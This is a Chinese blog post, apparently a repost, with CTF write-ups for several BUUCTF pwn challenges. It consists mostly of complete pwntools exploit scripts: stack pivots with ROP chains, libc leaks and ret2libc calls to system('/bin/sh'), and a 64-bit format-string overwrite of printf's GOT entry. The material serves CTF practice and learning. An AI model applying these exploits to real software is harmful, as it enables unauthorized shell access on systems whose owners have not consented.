我要评论
栈迁移,注意ret对齐
没对齐的:
对齐的:
exp:
from pwn import *
from LibcSearcher import *
local_file = './ACTF_2019_babystack'
local_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
remote_libc = '/root/glibc-all-in-one/libs/2.27/libc-2.27.so'
select = 0
if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 26558)
#libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
sleep(3)
sla('How many bytes of your message?\n', str(0xe0))
ru('at ')
stack_addr = int(rc(14),16)
info('stack', stack_addr)
pop_rdi = 0x0000000000400ad3 # pop rdi ; ret
leave_ret = 0x0000000000400a18 # leave ; ret
ret = 0x0000000000400709#ret
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main = 0x4008F6
p1 = 'a'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p1 = p1.ljust(0xd0, '\x00')
p1 += p64(stack_addr)+p64(leave_ret)
sea('What is the content of your message?\n', p1)
puts_addr = uu64(ru('\x7f')[-6:])
info('puts_addr', puts_addr)
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
#--------------------------------------------------------------------------------------------------------
sleep(3)
sla('How many bytes of your message?\n', str(0xe0))
ru('at ')
stack_addr2 = int(rc(14),16)
info('stack', stack_addr2)
p2 = 'a'*8+p64(pop_rdi)+p64(binsh_addr)+p64(ret)+p64(system_addr)+p64(main)
p2 = p2.ljust(0xd0, '\x00')
p2 += p64(stack_addr2)+p64(leave_ret)
debug()
sea('What is the content of your message?\n', p2)
r.interactive()
修改bss上的string为./flag就可以读出flag
exp:
from pwn import *
from LibcSearcher import *
local_file = './pwnme2'
local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
select = 1
if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 29605)
#libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
gets = elf.sym['gets']
exec_string = 0x80485CB
p = 'a'*0x6c+'b'*4+p32(gets)+p32(exec_string)+p32(0x804A060)
sla('input:\n', p)
sl('./flag')
r.interactive()
做这题的时候脑溢血,把栈地址改到ff之外去了,简直想锤自己
这题本来是秒的,但是最后有一些问题(以前也遇到过这种汇编,但是我都是在另一个函数里栈溢出的,所以也没想过这玩意)
用格式化字符串找到我们变量存储的位置,然后写backdoor就完事了
exp:
from pwn import *
from LibcSearcher import *
local_file = './qiandao'
local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
select = 0
if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('', )
#libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
backdoor = 0x804857D
sl('%2$p')
ru('0x')
stack = int(rc(8), 16) - 0x24
info('stack', stack)
p = p32(backdoor)+'a'*0x20+p32(stack)
#debug()
sl(p)
r.interactive()
exp:
from pwn import *
from LibcSearcher import *
local_file = './ciscn_s_9'
local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
remote_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so'
select = 1
if select == 0:
r = process(local_file)
#libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 27465)
#libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
fun_got = elf.got['puts']
fun_plt = elf.plt['puts']
main = elf.sym['main']
p1 = flat(['a'*0x20, 'b'*4, fun_plt, main, fun_got])
sl(p1)
#log.info(rl())
fun_addr = uu32(ru('\xf7')[-4:])
#fun_addr = uu32(rc(4))
info('fun_addr', fun_addr)
libc = LibcSearcher('puts', fun_addr)
libcbase = fun_addr - libc.dump('puts')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')
p2 = flat(['a'*0x20, 'b'*4, system_addr, 'b'*4, binsh_addr])
sl(p2)
r.interactive()
64位格式化字符串改got,修改printf的got为system,然后read读入||sh,来getshell
最好system放前面,got放后面,像这样,还要调整好对齐
准备好的字符串最好打印出来看一看,方便自己对齐
low = ((system>>16)&0xff) - len(“Repeater:”)
high = (system&0xffff) - ((system>>16) & 0xFF)
是因为c的话是算字节个数的,那就要减掉一开始的Repeater:,然后low因为算过一遍了,到时候修改high会算在high的字节数里,所以也要减掉
from pwn import *
from LibcSearcher import *
local_file = './axb_2019_fmt64'
local_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
select = 0
if select == 0:
r = process(local_file)
libc = ELF(local_libc)
else:
r = remote('node3.buuoj.cn', 26451)
libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se = lambda data :r.send(data)
sa = lambda delim,data :r.sendafter(delim, data)
sl = lambda data :r.sendline(data)
sla = lambda delim,data :r.sendlineafter(delim, data)
sea = lambda delim,data :r.sendafter(delim, data)
rc = lambda numb=4096 :r.recv(numb)
rl = lambda :r.recvline()
ru = lambda delims :r.recvuntil(delims)
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
info = lambda tag, addr :r.info(tag + ': {:#x}'.format(addr))
def debug(cmd=''):
gdb.attach(r,cmd)
sl('%83$p')
ru('0x')
libc_base = int(rc(12), 16) - libc.sym['__libc_start_main'] - 240
info('libc_base', libc_base)
system = libc_base + libc.sym['system']
info('system', system)
binsh = libc_base + libc.search('/bin/sh').next()
printf = elf.got['printf']
low = ((system>>16)&0xff) - len("Repeater:")
high = (system&0xffff) - ((system>>16)&0xff)
info('low', low)
info('high', high)
p = '%'+str(low)+'c%12$hhn'+'%'+str(high)+'c%13$hn'
p = p.ljust(32, 'a')
p += p64(printf+2)+p64(printf)
print p
sl(p)
sl('||sh')
r.interactive()
本文地址:https://blog.csdn.net/carol2358/article/details/107554781
如对本文有疑问, 点击进行留言回复!!
![buuctf DSACTF7月pwn 栈迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got](http://www.lhsxpumps.com/_images5/10qianwan/20200729/s_0_202007290918463877.png)
buuctf DSACTF7月pwn 栈迁移 ret对齐 修改bss的内容 lea esp, [ecx-4] 64位格式化字符串修改got
iPhone隔空投送功能怎么用 iPhone隔空投送常见问题和解决办法
iPhone 12/Pro/Pro Max/iPhone 11 Pro屏幕尺寸/刘海对比
网友评论